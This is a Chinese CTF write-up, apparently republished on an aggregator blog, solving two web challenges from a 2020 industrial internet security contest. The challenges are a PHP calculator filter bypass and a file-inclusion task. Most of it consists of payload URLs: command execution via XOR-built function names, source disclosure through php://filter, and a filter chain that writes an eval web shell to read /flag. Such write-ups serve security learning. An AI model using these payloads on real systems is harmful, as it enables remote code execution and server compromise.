我是靠谱客的博主 称心西装,这篇文章主要介绍2020全国工业互联网安全技术技能大赛Web题WP0x00 SimpleCalculator0x01 easyphp,现在分享给大家,希望可以做个参考。

0x00 SimpleCalculator

打开后,发现flag.php可执行数学函数,在网上找到一个原题:https://www.cnblogs.com/20175211lyz/p/11588219.html
可执行shell拿到flag。
payload如下:

http://eci-1cei547jhyas2r4f5r2.cloudeci1.ichunqiu.com/flag.php?search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag。

在这里插入图片描述

0x01 easyphp

打开后发现是个文件包含的题目,可通过

http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

拿到源码:
在这里插入图片描述
他提示需要访问7fa3b767c460b54a2be4d49030b349c7.php,访问后,可以看到7fa3b767c460b54a2be4d49030b349c7.php的源码。
在这里插入图片描述
通过代码审计,可以看到最后一行代码content被exit()函数分隔,这是个绕过死亡exit的题目。而上述waf没有过滤掉zlib.inflate,因此可以构造payload写入shell。

http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/7fa3b767c460b54a2be4d49030b349c7.php?content=?content=php://filter/write=string.strip_tags|zlib.inflate|%3f%3e%3c%3fphp+eval(%24_GET%5ba%5d)%3b%3f%3e%3c%3f/resource=shell.php

然后执行shell,发现flag文件。

http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/7fa3b767c460b54a2be4d49030b349c7.php?content=shell.php&a= ls /

在这里插入图片描述
于是查看/flag,可获得flag。

http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/7fa3b767c460b54a2be4d49030b349c7.php?content=shell.php&a= cat /flag

在这里插入图片描述
想学习更多网络安全的知识,可以关注公众号“SCLM安全团队”。
在这里插入图片描述

最后

以上就是称心西装最近收集整理的关于2020全国工业互联网安全技术技能大赛Web题WP0x00 SimpleCalculator0x01 easyphp的全部内容,更多相关2020全国工业互联网安全技术技能大赛Web题WP0x00内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(48)

评论列表共有 0 条评论

立即
投稿
返回
顶部